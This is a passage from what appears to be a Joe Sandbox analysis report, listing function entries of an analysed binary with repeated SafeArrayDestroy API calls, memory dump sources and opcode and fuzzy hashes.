                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: d347efb82edd82ef040068dd3c1e3a720a5308a8c89d994aaed8286d3ae8e486
                                                                                                                                                                                                                                              • Instruction ID: b40cc968058375176b8c9e02665d896197749e5e343e21bd3ccf70bc706753e0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d347efb82edd82ef040068dd3c1e3a720a5308a8c89d994aaed8286d3ae8e486
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77415D70A016189FDB10DF69CC80B9EB7B9AF89204F70859AE528EB351DB31E981CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF0338 Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: d347efb82edd82ef040068dd3c1e3a720a5308a8c89d994aaed8286d3ae8e486
                                                                                                                                                                                                                                              • Instruction ID: 8d1ef90c25bb0eb9a346c3219d5dbe569312639687afde79c43371d6aed5f966
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d347efb82edd82ef040068dd3c1e3a720a5308a8c89d994aaed8286d3ae8e486
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63416CB0A016599FCB00CFA9CC84B9DB7F9AF89204F30859AE528E7351CB71D941CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF8CE7 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: d2f95b1d28bda9924b96cc3e18953432410aa943bc90f3d47b9c5fd5a43d5574
                                                                                                                                                                                                                                              • Instruction ID: 8b0f65536b741bf1264e859d8b2cffc2f06b9a2e763ff254e0d1e295cfd0a97e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d2f95b1d28bda9924b96cc3e18953432410aa943bc90f3d47b9c5fd5a43d5574
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70313E70E016189FCB10CF69CC80B9EB7B9AF89208F308696E429EB755D771E981CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF8F83 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: 6d3276b68a61cdb4fc253a37e6fe1dde8efff7856be86f5ebde1f453994b9899
                                                                                                                                                                                                                                              • Instruction ID: 30ab7d149afffebd10e7dd5ec59dc9d1b4944c7d2f840370df7511d00981726e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d3276b68a61cdb4fc253a37e6fe1dde8efff7856be86f5ebde1f453994b9899
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1314D70E016089FDB10CF69CC80B5EB7B9AF89208F308586E428EB741CB35E981CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF8BDD Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: 08339ad3a06358a7fe0276542ffa73b0407732dd09751cf608313dc51057a180
                                                                                                                                                                                                                                              • Instruction ID: 1daf8e913f0245025c42fe06017ea8189475bf61e58e912098496a9c8f7b6306
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08339ad3a06358a7fe0276542ffa73b0407732dd09751cf608313dc51057a180
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0312A70E016189FDB10DF69CC80B5EB7B9AF89208F30858AE429EB755D771E981CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF04D3 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: 6d3276b68a61cdb4fc253a37e6fe1dde8efff7856be86f5ebde1f453994b9899
                                                                                                                                                                                                                                              • Instruction ID: 37645175a0565e501391fa9188c7f56754f531400d37da71c49fb542fe17e47f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d3276b68a61cdb4fc253a37e6fe1dde8efff7856be86f5ebde1f453994b9899
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD314DB0A016599FCB10CFA9CC84B5EB7B9AF99308F30858AE518E7741CB71D9418F50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF05DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: 3478266c2d1f0ab0d1bd9bbcc3b58b09ac8bdeea1df9d030ca9e883f3a1ad5b3
                                                                                                                                                                                                                                              • Instruction ID: 66d23b88cd882f006e79455ef411dac1185f2c97cca86afa09422575a4ab1368
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3478266c2d1f0ab0d1bd9bbcc3b58b09ac8bdeea1df9d030ca9e883f3a1ad5b3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D3148B0A016589FCB10CFA9CD84B9DB7B9AF99208F30859AE428E7741DB71E9418F50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF0668 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: c23d42e2a0dea704a5659a87f2abc184c32e91d36c90d37b5b068e0e4a954f01
                                                                                                                                                                                                                                              • Instruction ID: aeb10bba9bd7ca25af61e9d0daa0f539365febe1757e4daab469d500b491d1bf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c23d42e2a0dea704a5659a87f2abc184c32e91d36c90d37b5b068e0e4a954f01
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E314BB0A016589FCB00CFA9CD84B9DB7F9AF99308F30859AE528E7741DB71D9418F50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF908A Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: 3478266c2d1f0ab0d1bd9bbcc3b58b09ac8bdeea1df9d030ca9e883f3a1ad5b3
                                                                                                                                                                                                                                              • Instruction ID: afc472b20c1d9f7cc4d7e6fa2ded50b7b2e78b79c88ffde4fe410d48b78eb497
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3478266c2d1f0ab0d1bd9bbcc3b58b09ac8bdeea1df9d030ca9e883f3a1ad5b3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58313B70E016189FCB10DF69CC80B5EB7B9AF89208F30858AE529EB751D771E981CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF91A9 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
